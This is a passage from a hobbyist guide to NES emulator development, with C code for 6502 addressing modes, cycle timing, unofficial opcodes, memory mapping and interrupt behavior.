although it is convention to leave it 0xFD or 0xFF indicating the
stack is free. The unused bit (0x20) does not exist in the register flag,
but what happens is that when NMI/IRQ/BRK/PHP gets used and the status
flag gets pushed onto the register, the unused bit always gets pushed onto
the stack as 1. Most games first instruction is a SEI, which sets the
interrupt bit to mask any interrupts that would happen, but setting the
interrupt bit on power on wouldn't hurt. The PC is set to the RESET vector
address upon startup. For ROMs that only have 1 PRG Bank upon load up,
(0x4000 bytes), it is copied to address 0x8000 and addr[0xC000]
contains the same things that addr[0x8000].
That is for ROMs with 1 PRG bank, if there are 2 or more, then it depends
on what kind of cartridge the game is. Example: MMC1 (INES mapper #1)
loads addr[0x8000, 0xBFFF] with the first PRG bank,
and addr[0xC000, 0xFFFF] with the last PRG bank of the file.
Once it reads the RESET vector and jump to the address inside the
RESET vector, it starts decoding the instructions at the
address and the fun begins. For the RAM, there are some pirate carts out
there that assumes some location in the RAM is 0, and will have code
that depends on those locations being 0, and most games zero out the RAM
on start-up, it is recommended you set the RAM[0, 0x800] to 0 on start-up,
though it should remain unchanged during a soft reset.
For the PPU, the scrolling latch is set/unset based on your conditional
code (covered in the PPU section, it's the latch for 0x2005 and0x2006),
and games should set the PPU regs to their liking, but you can
set them reflecting the power up state of the PPU from the link above.
As for the APU, treat them as if they were running in some existing state,
for example, assuming we set every APU registers to 0, we would run
the APU in that condition at startup, that means the timers
(covered later) would be 2 for pulse wave, 1 for triangle etc.
There are some quirks that is covered in the links above saying how
some registers doesn't work within X amount of cycles, this is why games
usually wait at least 1 frame before starting any PPU code,
you don't have to implement this if you don't want, this
behavior is probably different on every NES, though you could,
forcing homebrew game authors who someday might use your
emulator to learn that they can't use those registers before
a certain time is reached, but aside from that, the extra
code doesn't really help it having more compatibility.

On soft restart (using the button restart), the PC register is
read twice, then the program counter gets pushed on to the stack,
hi-nibble first, then the status register gets pushed (the unused flag
doesn't seem to be set when pushed here) and the interrupt flag is set,
then the program counter is loaded with the RESET vector. As you can see,
the registers do not get reset or anything.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++++++++++++Implementing Opcodes++++++++++++++++++++++++++++++

Emulating the CPU can be made very simple due to the fact that all
memory accesses in the NES is done in bytes, so you do not have to worry
about issues like endian unless you wanted to implement some optimizations.

Opcodes are the machine code instruction that does some math
calculation or conditional branching, it is just the number equivalent
of 6502 assembly.
Example: LDA $#10 will be 0xA9 0x10 when read inside the PRG-ROM.

There are 2 main ways to implementing the opcodes
for the NES, one is a big switch block and one is
function pointers.

==========================================================================

Example:
cpu.opcode = mem_read(cpu.pc++);
switch (cpu.opcode)
{
case opcode:
//do stuff
break;
}
or decode[mem_read(cpu.pc++)]();

==========================================================================

I recommend using the switch since it saves the overhead of function
jumps and since the opcodes are in linear length, [0, 0xFF], a good
compiler can transform the switch statement into a jump table for
efficient branching. A switch statement also has the abilities of using
gotos to save multiple cases, saving a few more function calls or redundant
code when using function pointers.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++++++++++Splitting up flags+++++++++++++++++++++++++++++++

It is a good idea to split up the status flag register into
something like fi, fz, fc, fn, and fb. Most opcodes
set some form of status in the flag, so splitting them up save
bitwise operations you have to perform.

========================================================================

Example:
//LDA_IM using status flag
cpu.a = mem_read(cpu.pc++);
status_flg = (status_flg & ~(n_flag | z_flag)) |
(cpu.a & n_flag) | (!cpu.a << 1);
//LDA_IM using split flags
cpu.a = mem_read(cpu.pc++);
cpu.fz = cpu.fn = cpu.a; //we can decode this
//when needed

=========================================================================

With split flags we can just set equal to the register. Since most
opcodes set status bits, it is faster to figure it out when the branching
opcode takes place,instead of doing it with every opcode that sets the
status bit. There are some opcodes that requires all the separate flag
byte to be combined into one byte, such as PHP which pushes the status
flag onto the stack and PLP which pulls the status flag off of the stack.
The BRK instruction, NMI, and IRQ also pushes the status flag onto
the stack to save the state before jumping to the handler.
To handle this, you can make a function that OR everything together
when the flags needs to be combined and split the flag up on when the
flags need to be split back into normal. This is still faster than
using one byte status flag, due to PHP, PLP, NMI, BRK, and IRQ is
not used as much as all the other opcodes that sets the status flags.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++++++++Memory Access++++++++++++++++++++++++++++++++++++++

For memory access, blargg ran a few heuristic tests and
found the hybrid solution of using if/else along with
function pointers to work the best. Most games access the
RAM portion of the code, implementing this in a top portion
if condition is faster than using a function pointer.

==========================================================================

Example (blargg's method):
u8 mem_read(u16 addr)
{
/* focus on optimizing the RAM, because
we assume that the RAM is accessed
much more than any other addresses,
it is recommended one do their own
test and pick memory area
they want to optimize most */

if (addr < 0x800)
return ram[addr]; //save an AND 0x7FF
/* make another function so this function be small enough
so it has a better chance to be in the cache */

else
return mem_read_other(addr);
}
u8 mem_read_other(u16 addr)
{
/* assume that the developers know
that 0x800 to 0x2000 are just mirrors
of 0 to 0x7FF and won't use it as much */

if (addr < 0x2000)
return ram[addr & 0x7FF];
else if (addr <= 0x3FFF)
return ppu_read(addr);
else if (addr >= 0x4000 && addr <= 0x4017)
return apu_read(addr);
else
return mem_read_fp[addr >> 12](addr);
}

==========================================================================

The same idea for memory access could be implemented for write
functions. You could use function pointers gain a little speed. The PPU, APU,
and RAM have well defined addresses, but outside of that,
the cartridge defines the addresses beyond 0x4017,
so function pointers would be the best way to handle such diversity.
You can set the function pointers in your mapper init function to point
to the correct handler. For ppu_read and apu_read, it is best if one use
a switch since the addresses are also in linear order, so a jump table
can be made efficiently. There is also the route of using full function
pointers for the memory accesses, while this is a little bit slower,
this has the advantage when it comes to debugging, one can have a debug
flag in their code and when turned on, the memory access can
switch to their debugging counterparts.

==========================================================================

Example:
mem_read_fp[0] = read_ram;
mem_read_fp[1] = read_ram;
....
mem_read_fp[15] = read_prg_hi;
u8 mem_read(u16 addr)
{
return mem_read_fp[addr >> 12](addr);
}

==========================================================================

While the program counter can be in any address mapping, [0, 0xFFFF],
it mainly executes code inside [0x8000, 0xFFFF] (The ROM space), using the
if/else form of mem_read is not as efficient as the function pointer form
for getting opcodes and its operands. It is recommended you use the
function pointer form of mem_read, and use the if/else form of mem_read
for memory accesses to the RAM and low addresses. When using the function
pointers to get opcodes, it is a good idea to introduce another memory
location, mem_read_fp[16] to point to read_ram. This is so the mem_read()
in function pointer form can handle access overflows without resorting
to running AND on all of the operand get instructions.

==========================================================================

Example:
cpu.pc = 0xFFFF;
cpu.opcode = mem_read((cpu.pc + 1) & 0xFFFF)
cpu.pc = (cpu.pc + 1) & 0xFFFF;
/* handling 0xFFFF overflow case */

==========================================================================

==========================================================================

Example:
/* now if cpu.pc was 0xFFFE */
cpu.opcode = mem_read((cpu.pc + 1) & 0xFFFF);
cpu.pc = (cpu.pc + 1) & 0xFFFF; /* is now 0xFFFF */
switch (cpu.opcode)
{
/* Now all the memory operand is
going to be in the range of
0x10000 and above, one would
have to AND with all the operands */

case opcode:
operand = (cpu.pc + 1) & 0xFFFF;
/* do stuff */
break;
}

==========================================================================

With assigning another function pointer
to to address lines 0x10000, 0x10FFF),
you can just AND the cpu.pc with 0xFFFF everytime,
instead of all the operands.

==========================================================================

Example:
/* with mem_read_fp[16] assigned to read_ram */
cpu.opcode = mem_read(cpu.pc++);
cpu.pc &= 0xFFFF;
switch (cpu.opcode)
{
case opcode:
operand = mem_read(cpu.pc++); /* get operand */
/* do stuff */
break;
}

==========================================================================

As shown, the giving the line mem_read_fp[16] allows us to deal with
the overflow issue in one case of code, saving redundant code, and is
faster. A faster, but not as portable way to deal with this is to have
cpu.pc as a unsigned short, if we assuming the sizeof(short) to be
2 bytes and CHAR_BITS to be 8, it will handle the overflow issue for us
by wrapping around when cpu.pc reaches 0x10000, but if we want our
code to be portable, this method won't work as well as
giving mem_read_fp another pointer location.

With the limited NES memory mapping for the PRG-ROM, many game
cartridges allow these ROMs to be bankswitch, that is, replace the data
in addresses [0x8000, 0xBFFF] or [0xC000, 0xFFFF] with something different
when a writing to a register takes a place. One can handle this with
using pointers, having cpu.prg_bank[0] point to a PRG_ROM bank, and
having cpu.prg_bank[1] point to another PRG_ROM bank, and to
switch you can just assign the pointers to a different memory location.
This implies that cpu.prg_bank[0] and cpu.prg_bank[1] points to 0x4000
of data, now some cartridges can switch in a smaller size of memory data,
so introducing several more prg_bank pointers that can point to a smaller
fragment of memory, such as 0x2000 chunks of data, and then have reassign
the PRG-ROM function pointers to a function that properly read such data
chunks. Game cartridges also sometimes write to memory location or tries
to switch banks that doesn't seem to exist.

==========================================================================

Example:
void mapper_write_handle(u16 addr, u8 data)
{
/* let say that there are 4 prg banks in the rom file
and data is 10 */

switch (addr & 0xF000)
{
case 0x8000: /* switch 0x4000 chunks of data at 0x8000 */
cpu.prg_bank[0] = &prg_rom[0x4000*data]; /* out of bounds */
break;
}
}

==========================================================================

The reasoning to this is how the hardware handles such a transaction,
it can either ignore the write if it is too big,
or it wraps around (data % prg_size). Consult the mappers documentation
to decide if you should ignore something like this in a specific mapper
or handle it. If it is a mapper that is not documented, the only way is
through is trial and error.

The MOS 6502 opcodes can be categorized by their memory access, such as
zero page addressing, absolute, indirect, etc. In fact, the bulk of the
opcodes inside the CPU are the same, such as there are 8 opcodes of
ADC (add with carry) or 9 opcodes of SBC (subtract with carry), the only
thing that differs is how where the memory access, where it writes to, and
how long it takes. Abstracting these inside functions allow much
saving of redundant code.

===========================================================================

Example:
switch (cpu.opcode)
{
case lda_imm:
get_imm();
goto lda;
case lda_zp:
get_zp():
goto lda;
case adc_imm:
get_imm();
goto adc;

lda: /* do stuff */
break;
adc: /* do stuff */
break;
}

============================================

Abstracting the memory access operations also
helps simplify timing that is covered later, since
a MOS 6502 clocks cycles by a memory read/write.
For a write or read, one cycle is clocked.

+++++++++++++++++++++++Useful CPU tidbits+++++++++++++++++++++++++++++++++

Here are the all the memory accesses used by opcodes rd and wr are
just abstracted mem_read() and mem_write(), *_rmw() access is
read/write/modify, *_w() is for instructions that write, and *_r() is
for instruction that reads the behavior is documented in the code.
I wanted to include this because there are some unclear
things such as if zero page wraps around or what happens
if indirect y access beyond 0xFFFF mark. So here it is.

There are instructions that does a read without assigning it to other
variables. The reason for this is that rd and wr is abstracted to handle
timing covered later, there are also memory mapped registers, that their
behavior is affected by a read, thus we need to put it in there to handle
such behaviors. For more information on why there are such reads and
writes, refer to http://www.viceteam.org/plain/64doc.txt which covers
extensive amount of cycle by cycle information for opcodes. To sum it up,
though, the reason for the extra read because of page crossing,
sometimes the PC high byte is off due to the quirk in the hardware,
and since the processor cannot undo a write to an invalid address,
it reads from the address first, then write, this is why you see
extra reads in memory write code.

==================Memory Access===========================================

1 read or write means 1 CPU cycle.
PC is the program counter. Some behavior
in the code does not match what is explained,
but this is just due to how the memory fetching
cannot affect any other units, since the NES
is a single CPU, the order of operation in the
opcodes doesn't matter to much as long as the
cycle count is achieved. The only thing that
matters is the operation part, where it does
the operation to the opcode.

imp() is implied mode, it is for opcodes
that does not load a value or write to from memory,
but instead sets a flag, transfer variables,
or push things onto the stack, etc.
1. Fetch opcode from the current PC address,
and then increment the PC.
2. Read the next instruction byte, but doesn't
do anything to it, and then do operation on it.
2 cycles

//Implied/Immediate modes
void imp()
{
rd(cpu.pc);
}

imm() is immediate mode, this
is 2 cycles, where it fetches
the next place in the program counter
getting the operand for the opcode to
act on, this is for things such
as adding/subtracting constants,
loading values, etc.
1. Fetch opcode from the current PC address,
and then increment the PC.
2. Fetch the operand from next byte in PC,
increment the PC, and do operation using the
value fetched.
2 cycles

void imm()
{
cpu.tmp = rd(cpu.pc++);
}

zp_r() is zero page read mode.
It is for opcodes that read from zero page,
to get the value and do operation on it,
such as zero page ADC, SBC, LDA, CMP, etc.
The address range is [0, 0xFF], thus
saving one cycle for getting the hi byte
of the PC.
1. Fetch opcode from the current PC address,
and then increment the PC.
2. Fetch the operand from the next byte
in the PC, and then increment the PC.
3. Fetch the value stored in the
address which is the operand
value, and do operation using the
value fetched from the address.
3 cycles

//Read modes
void zp_r()
{
cpu.addr = rd(cpu.pc++);
cpu.tmp = rd(cpu.addr);
}

zpx_r() is zero page indexed addressing.
It is the same as zp_r(), but it adds the operand
address with the X register value to get the address
needed.
1. Fetch opcode from the current PC address,
and then increment the PC.
2. Fetch the operand from the next byte
in the PC, and then increment the PC.
3. Read from the address, and then
add the X register to the address,
it wraps around to 0 if address + X > 0xFF,
as it does not handle page crossing.
4. Fetch the value at the address,
and then do operation on it.
4 cycles

void zpx_r()
{
cpu.addr = rd(cpu.pc++);
rd(cpu.addr);
cpu.addr = (cpu.addr + cpu.x) & 0xFF;
cpu.tmp = rd(cpu.addr);
}

zpy_r() is zero page indexed addressing.
It is the same as zp_r(), but it adds the operand
address with the Y register value to get the address
needed.
1. Fetch opcode from the current PC address,
and then increment the PC.
2. Fetch the operand from the next byte
in the PC, and then increment the PC.
3. Read from the address, and then
add the Y register to the address,
it wraps around to 0 if address + X > 0xFF,
as it does not handle page crossing.
4. Fetch the value at the address,
and then do operation on it.
4 cycles

void zpy_r()
{
cpu.addr = rd(cpu.pc++);
rd(cpu.addr);
cpu.addr = (cpu.addr + cpu.y) & 0xFF;
cpu.tmp = rd(cpu.addr);
}

abs_r() is absolute addressing,
the range is [0, 0xFFFF], covering
the entire memory of the CPU memory
map.
1. Fetch opcode from the current PC address,
and then increment the PC.
2. Fetch low byte of the address from the next
byte in current PC, and then increment the PC.
3. Fetch hi byte of the address from the next
byte in current PC, and then increment
the PC.
4. Fetch value from data, and then
do operation on it.
void abs_r()
{
cpu.addr = rd(cpu.pc++);
cpu.addr |= rd(cpu.pc++) << 8;
cpu.tmp = rd(cpu.addr);
}
absx_r() works the same way as
abs_r() except it adds the X register
to the address for the value it gets
(absolute indexed addressing).
If address + X page crosses however,
(a page is 256 bytes in size, so
0, 0xFF is 0 page, 0x100, 0x1FF is
the first page, so on...)
then it takes another cycle
to fix it (This is due to the hardware
getting a wrong value for the hi byte),
then it fetch the value as normal.
1. Fetch opcode from the current PC address,
and then increment the PC.
2. Fetch low byte of the address from the next
byte in current PC, and then increment the PC.
3. Fetch hi byte of the address from the next
byte in current PC, increment the PC,
and then add the X register to the address.
4. If there was no page crossing, skip this step,
if there was, read from the address, and fix
the hi byte (don't need to do anything to fix the hi byte
in software.)
5. Read from the new fixed address.
4 cycles if no page crossing, 5 if there is.

void absx_r()
{
cpu.addr = rd(cpu.pc++);
cpu.addr |= rd(cpu.pc++) << 8;
cpu._addr = (cpu.addr & 0x100);
cpu.addr += cpu.x;
if ((cpu.addr & 0x100) ^ cpu._addr)
rd(cpu.addr);
cpu.tmp = rd(cpu.addr);
}

absy_r() works the same way as
abs_r() except it adds the Y register
to the address for the value it gets
(absolute indexed addressing).
If address + Y page crosses however,
(a page is 256 bytes in size, so
0, 0xFF is 0 page, 0x100, 0x1FF is
the first page, so on...)
then it takes another cycle
to fix it (This is due to the hardware
getting a wrong value for the hi byte),
then it fetch the value as normal.
1. Fetch opcode from the current PC address,
and then increment the PC.
2. Fetch low byte of the address from the next
byte in current PC, and then increment the PC.
3. Fetch hi byte of the address from the next
byte in current PC, increment the PC,
and then add the Y register to the address.
4. If there was no page crossing, skip this step,
if there was, read from the address, and fix
the hi byte (don't need to do anything to fix the hi byte
in software.)
5. Read from the new fixed address.
4 cycles if no page crossing, 5 if there is.

void absy_r()
{
cpu.addr = rd(cpu.pc++);
cpu.addr |= rd(cpu.pc++) << 8;
cpu._addr = (cpu.addr & 0x100);
cpu.addr += cpu.y;
if ((cpu.addr & 0x100) ^ cpu._addr)
rd(cpu.addr);
cpu.tmp = rd(cpu.addr);
}

The indx_r() is an addressing mode that
is like pointers in C, where it fetches a value
that is used as a pointer that points to the real
address, then it gets the real address from it, and
then do operation on it.
1. Fetch the opcode from the current address in PC.
2. Fetch the pointer address from the next byte
in the PC, increment PC.
3. Read from the address, and then add X to it,
since this address is in 0 page, the wrap around
that affects zero page applies here for page crossing.
4. Using the pointer value, dereference it to get the
low byte value.
5. Then (pointer + 1) contains the hi byte of the address,
use that to get the hi byte of the address
6. Fetch the value from it, and then do the operation
on it.
6 cycles
void indx_r()
{
cpu.addr = rd(cpu.pc++);
rd(cpu.addr);
cpu.tmp = (cpu.addr + cpu.x) & 0xFF;
cpu.addr = rd(cpu.tmp);
cpu.addr |= rd((cpu.tmp + 1) & 0xFF) << 8;
cpu.tmp = rd(cpu.addr);
}
The indy_r() is like the indx_r(), except
that instead of adding the pointer value with the
register to get the actual address, it gets the
actual address first, and then it adds the Y
register to the address to get the value.
It is used to implement pointers to array type
structure.
1. Fetch the opcode from the current address in PC.
2. Fetch the pointer address from the next byte
in the PC, increment PC.
3. Fetch the low byte of the address from the pointer
value.
4. Fetch the hi byte of the address from the pointer
value + 1, page crossing wraps around works the same way
they do in zero page, and then add y to the low byte of the
address.
5. If there was no page crossing skip this step, if there was,
execute another cycle due to the hardware needing to fix
the hi byte of the address during this time.
6. Fetch the value at the address.
5 cycles if no page crossing, 6 if there was.
void indy_r()
{
cpu._addr = rd(cpu.pc++);
cpu.addr = rd(cpu._addr);
cpu.addr |= (rd((cpu._addr+1) & 0xFF) << 8);
cpu._addr = cpu.addr & 0x100;
cpu.addr += cpu.y;
if ((cpu.addr & 0x100) != cpu._addr)
rd(cpu.addr);
cpu.tmp = rd(cpu.addr);
}

//Write modes
The write modes work exactly
the same way as the read modes, except
it does not read the value specified,
it gets the operands first, and then
it uses that value to do the operation
on it, then it writes to it later,
which takes 1 extra cycle not shown in these
code, since it needs to do the operation using
the operand first.
void zp_w()
{
cpu.addr = rd(cpu.pc++);
}
void zpx_w()
{
cpu.addr = rd(cpu.pc++);
rd(cpu.addr);
cpu.addr = (cpu.addr + cpu.x) & 0xFF;
}
void zpy_w()
{
cpu.addr = rd(cpu.pc++);
rd(cpu.addr);
cpu.addr = (cpu.addr + cpu.y) & 0xFF;
}
void abs_w()
{
cpu.addr = rd(cpu.pc++);
cpu.addr |= rd(cpu.pc++) << 8;
}
void absx_w()
{
cpu.addr = rd(cpu.pc++);
cpu.addr |= rd(cpu.pc++) << 8;
cpu.addr += cpu.x;
rd(cpu.addr);
}
void absy_w()
{
cpu.addr = rd(cpu.pc++);
cpu.addr |= rd(cpu.pc++) << 8;
cpu.addr += cpu.y;
rd(cpu.addr);
}
void indx_w()
{
cpu._addr = rd(cpu.pc++);
rd(cpu._addr);
cpu._addr = (cpu._addr + cpu.x) & 0xFF;
cpu.addr = rd(cpu._addr);
cpu.addr |= (rd((cpu._addr + 1) & 0xFF) << 8);
}
void indy_w()
{
cpu._addr = rd(cpu.pc++);
cpu.addr = rd(cpu._addr);
cpu.addr |= (rd((cpu._addr + 1) & 0xFF) << 8);
cpu.addr += cpu.y;
rd(cpu.addr);
}

//read modify write mode
The read modify write mode
is a combination of read and write,
it is for opcodes such as DEC or INC,
ROR, ROL, etc.
So basically, these modes fetches the opcode,
and operands, and then get the value at the
address, write back the value that was just read,
and then do the operation on it, then finally writing
to the address with the new value.
void zp_rmw()
{
zp_r();
rd(cpu.addr);
}
void zpx_rmw()
{
zpx_r();
wr(cpu.addr, cpu.tmp);
}
void abs_rmw()
{
abs_r();
wr(cpu.addr, cpu.tmp);
}
void absx_rmw()
{
cpu.addr = rd(cpu.pc++);
cpu.addr |= rd(cpu.pc++) << 8;
cpu.addr += cpu.x;
rd(cpu.addr);
cpu.tmp = rd(cpu.addr);
wr(cpu.addr, cpu.tmp);
}
void absy_rmw()
{
cpu.addr = rd(cpu.pc++);
cpu.addr |= rd(cpu.pc++) << 8;
cpu.addr += cpu.y;
rd(cpu.addr);
cpu.tmp = rd(cpu.addr);
wr(cpu.addr, cpu.tmp);
}
void indx_rmw()
{
indx_r();
wr(cpu.addr, cpu.tmp);
}
void indy_rmw()
{
indy_w();
cpu.tmp = rd(cpu.addr);
wr(cpu.addr, cpu.tmp);
}
void rmw_w()
{
wr(cpu.addr, cpu.tmp);
}

=====================Obscure Behavior of opcodes==========================

Here are some opcode beahaviors that is while documented, takes some
effort to find, so I decided to list them here.

cpu.fv = overflow flag
cpu.fn = sign flag
cpu.fc = carry flag
cpu.a = accumulator
cpu.x = x register

The behavior for ADC and SBC:

void adc()
{
cpu._addr = cpu.a + cpu.tmp + cpu.fc;
//overflow is basically negative + negative = positive
//postive + positive = negative
cpu.fv = (cpu._addr ^ cpu.a) &
(cpu._addr ^ cpu.tmp) & 0x80;
cpu.fc = (cpu._addr & 0x100) >> 8;
cpu.fz = cpu.fn = cpu.a = cpu._addr & 0xFF;
}

void sbc()
{
cpu._addr = cpu.a - cpu.tmp - !cpu.fc;
cpu.fv = (cpu.a ^ cpu.tmp) &
(cpu.a ^ cpu._addr) & 0x80;
cpu.fc = !(cpu._addr & 0x100);
cpu.fz = cpu.fn = cpu.a =
cpu._addr & 0xFF;
}

Here is the behavior of page crossing on branching instruction

cpu._tmp = (s8) rd(cpu.pc++);
if (cond)
{
cpu.addr = (cpu.pc & 0x100);
rd(cpu.pc);
cpu.pc += cpu._tmp;
//bvc doesnt need to page crossing check
//it always take 3 cycles no matter where it is
if (cpu.addr ^ (cpu.pc & 0x100))
rd(cpu.pc);
}

A quirk of the BRK instruction
void brk()
{
rd(cpu.pc++);
push(cpu.pc >> 8);
push(cpu.pc & 0xFF);
cpu.fb = 1;
join_flgs();
push(cpu.p);
cpu.fi = 1;
/* if nmi pending gets set during 4th
* cycle brk gets masked by nmi but brk
* flag will still be pushed
* documented in 64doc.txt
* and found in nintendulator emulator src code
* thanks for the accurate behavior */

if (cpu.nmi) //the quirk
{
cpu.nmi = 0;
cpu.pc = rd(0xFFFA);
cpu.pc |= (rd(0xFFFB) << 8);
}
else
{
cpu.pc = rd(0xFFFE);
cpu.pc |= (rd(0xFFFF) << 8);
}
}

==========================================================================

================Unofficial Opcodes========================================

There is some differing behavior for the same undocumented
opcodes in the docs, I used blargg's cpu test and managed
to get most of the undocumented opcode tests to pass, I'll list
the behavior here, they are not all correct, but I'll
also list them here, with a note.
(failed 3 tests in blargg's cpu
test, 2 were said to be faulty by blargg himself).
Also, many undocumented opcodes are a combination
of nearly space opcodes, such as SAX is a combination of
AND + STA. The reason for this had to do with how the 6502
decode instructions. For more information, consult
http://www.pagetable.com/?p=39. Most games do not use
undocumented opcodes, but there are some that do, its a good
idea to implement these opcodes.

void anc()
{
//not quite sure what this opcode is called
//opcode 0x0B and 0x2B (they're the same supposedly)
imm();
_and();
cpu.fc = (cpu.fn & 0x80) >> 7;
}

void asr()
{
//AND + LSR
//opcode is 0x4B
imm();
_and(); //AND
lsr(cpu.a); //LSR
}

void arr()
{
//one of the opcode that fails,
//but this behavior is given by blargg

//memory access
//imm(); // opcode 0x6B
cpu.a = (cpu.a & cpu.tmp) >> 1;
if (!cpu.fz)
cpu.fz = 1;
else if (!cpu.a)
cpu.fz = 0;
cpu.fn = cpu.a;
cpu.fc = cpu.fv = 0;
switch (cpu.a & 0x60)
{
case 0x00: break;
case 0x20: cpu.fv = 1; break;
case 0x40: cpu.fv = 1; cpu.fc = 1; break;
case 0x60: cpu.fc = 1; break;
}
}

void asx()
{
//some call it SAX
//opcode is 0xCB
//SBC without carry

imm();
cpu._addr = (cpu.a & cpu.x) - cpu.tmp;
cpu.fz = cpu.fn = cpu.x = cpu._addr & 0xFF;
cpu.fc = !(cpu._addr & 0x100);
}

void atx()
{
//atx (lxa) and + tax
//opcode 0xAB
imm();
cpu.a |= 0xFF;
_and();
cpu.x = cpu.a;

//the OR cpu.a |= 0xFF
//constant is different on different MOSes.
//here is a possible explanation from tepples, a nesdev
//member. Thanks to hap and tepples for talking about the behavior.
/*
Hap: I was able to fix ATX by ORing A with $FF,
according to documents it's ORed with $EE, $EF, $FE,
or $FF depending on CPU internal state like the program counter.
Tepples: $EF in particular looks like the mask for a carry coming out
of the lower nibble, as might be seen in hardware handling
packed binary-coded decimal, such as the original
6502 CPU manufactured by MOS Technology.
Hap: Maybe on the NES it's always ORed with $FF,
at least it makes your test program a bit happier on my emu.
Tepples: This might be the case for the NES,
which for patent reasons uses a cut-down 6502
core lacking decimal mode.*/

}

void axa()
{
//absy_w() is 0x9F;
//indy_w() is 0x93;
wr(cpu.addr, cpu.x & cpu.a & 7);
}

void dcp()
{
//DEC + CMP

//zp_rmw() is opcode 0xC7
//zpx_rmw() is opcode 0xD7
//abs_rmw() is opcode 0xCF
//absx_rmw() is opcode 0xDF
//absy_rmw() is opcode 0xDB
//indx_rmw() is opcode 0xC3
//indy_rmw() is opcode 0xD3
decr(cpu.tmp); //DEC
comp(cpu.a); //CMP A
rmw_w();

}

void hlt()
{
//some call it KIL
//halt the CPU, reset needed to continue
//operation
/* opcode 0x02, 0x12, 0x22, 0x32,
0x42, 0x52, 0x62, 0x72, 0x92, 0xB2,
0xD2, 0xF2 */

}

void isb()
{
//also called ISC in some docs, INC + SBC

//zp_rmw() is opcode 0xE7
//zpx_rmw() is opcode 0xF7
//abs_rmw() is opcode 0xEF
//absx_rmw() is opcode 0xFF
//absy_rmw() is opcode 0xFB
//indx_rmw() is opcode 0xE3
//indy_rmw() is opcode 0xF3
incr(cpu.tmp); //INC
sbc(); //SBC
rmw_w();
}

void lar()
{
//some call it LAE or LAS
//opcode is 0xBB
absy_r();
cpu.a = cpu.x = cpu.s = cpu.tmp & cpu.s;
}

void lax()
{
//LDA + LDX

//zp_r() is opcode 0xA7
//zpy_r() is opcode 0xB7
//abs_r() is opcode 0xAF
//absy_r() is opcode 0xBF
//indx_r() is opcode 0xA3
//indy_r() is opcode 0xB3
cpu.fz = cpu.fn =
cpu.a = cpu.x = cpu.tmp;
}

void nop_undocumented()
{
switch (cpu.opcode)
{
case 0x80: case 0x82: case 0x89:
case 0xC2: case 0xE2: //nop_im
imm();
break;
case 0x04: case 0x44: case 0x64: //nop_zp
zp_r();
break;
case 0x14: case 0x34: case 0x54:
case 0x74: case 0xD4: case 0xF4: //nop_zpx
zpx_r();
break;
case 0x0C: //nop_abs
abs_r();
break;
case 0x1C: case 0x3C: case 0x5C:
case 0x7C: case 0xDC: case 0xFC: //nop_absx
absx_r();
break;
}
}

void rla()
{
//ROL + AND

//zp_rmw() is opcode 0x27
//zpx_rmw() is opcode 0x37
//abs_rmw() is opcode 0x2F
//absx_rmw() is opcode 0x3F
//absy_rmw() is opcode 0x3B
//indx_rmw() is opcode 0x23
//indy_rmw() is opcode 0x33
rol(cpu.tmp); //ROL
_and(); //AND
rmw_w();
}

void rra()
{
//ROR + ADC

//zp_rmw() is opcode 0x67
//zpx_rmw() is opcode 0x77
//abs_rmw() is opcode 0x6F
//absx_rmw() is opcode 0x7F
//absy_rmw() is opcode 0x7B
//indx_rmw() is opcode 0x63
//indy_rmw() is opcode 0x73
ror(cpu.tmp); //ROR
adc(); //ADC
rmw_w();
}

 void sax() 
{
//AND + STA some docs call this asx but asx is used
//by another opcode, nestest.nes uses this as asx

//zp_w() is opcode 0x87
//zpy_w() is opcode 0x97
//abs_w() is opcode 0x8F
//indx_w() is opcode 0x83
mem_write(cpu.addr, cpu.a & cpu.x);
}

void sbc_undocumented()
{
//this is exactly the same as 0xe9 (sbc immediate)
//opcode.

//opcode is 0xEB
imm();
sbc();
}

void slo()
{
//ASL + ORA

//zp_rmw() is opcode 0x07
//zpx_rmw() is opcode 0x17
//abs_rmw() is opcode 0x0F
//absx_rmw() is opcode 0x1F
//absy_rmw() is opcode 0x1B
//indx_rmw() is opcode 0x03
//indy_rmw() is opcode 0x13
asl(cpu.tmp); //ASL
_ora(); //ORA
rmw_w();
}

void sre()
{
//LSR + EOR

//zp_rmw() is opcode 0x47
//zpx_rmw() is opcode 0x57
//abs_rmw() is opcode 0x4F
//absx_rmw() is opcode 0x5F
//absy_rmw() is opcode 0x5B
//indx_rmw() is opcode 0x43
//indy_rmw() is opcode 0x53
lsr(cpu.tmp); //LSR
_eor(); //EOR
rmw_w();
}

void sxa()
{
//one of the opcode that fails, blargg
//says its one of the faulty ones, never
//seen a game that uses it, though.
//some call it SHX or XAS
//opcode 0x9E
absx_w();
wr(cpu.addr, cpu.fz = cpu.fn = (cpu.y &
((cpu.addr - cpu.x) >> 8)) + 1);
}
void sya()
{
//one of the opcode that fails, blargg
//says its one of the faulty ones, never
//seen a game that uses it, though.
//some call it SHY or SAY
//opcode 0x9C
absx_w();
wr(cpu.addr, cpu.fz = cpu.fn = (cpu.y &
((cpu.addr - cpu.x) >> 8)) + 1);
}

void xaa()
{
//some call it ANE
//opcode is 0x8B
imm();
cpu.fn = cpu.fz = cpu.a =
cpu.x & cpu.tmp;
}
==========================================================================

=======================NMI/IRQ behavior===================================

NMI is known as non-maskable interrupt, and it is
triggered by the PPU when it finishes drawing everything, and
enters vertical blank, the time when the drawing gun in the TV
re-positions itself. While it is called a "non-maskable" interrupt,
in that no CPU operation can prevent it from happening,
you can mask it by writing 0 to the 7th bit to the memory mapped
register 0x2000 (PPUCTRL).

IRQ is an interrupt request that can be generated
by the APU or the game hardware cartridge. There are multiple
subunits inside the APU that can trigger an IRQ, all it takes
is one subunit to fire an IRQ for it to happen. IRQs are
continuously asserted, that is, unlike NMI, when the IRQ handler
jumps to the IRQ code, it does not clear the flag that tells
the CPU that it doesn't need to assert anymore. Shown above
in the handle_nmi and handle_irq code, cpu.nmi gets cleared
at the end, while cpu.irq does not, it just gets masked
by cpu.fi (interrupt flag on, no jump to interrupts)
be set to true, as soon as the you exit the handler using RTI,
or clearing the interrupt flag, the CPU will see another IRQ
pending and will rejump again. It is up to the programmer
of the game to clear IRQs or mask it, not the NES. As for NMI,
this is handle automatically for you. The frame counter and
the DMC channel are the 2 ways the APU can trigger an NMI.
These 2 will be covered more in detail in the relevant
section (PPU for NMI), (APU for IRQs).

=======Triggering IRQ example=============================================

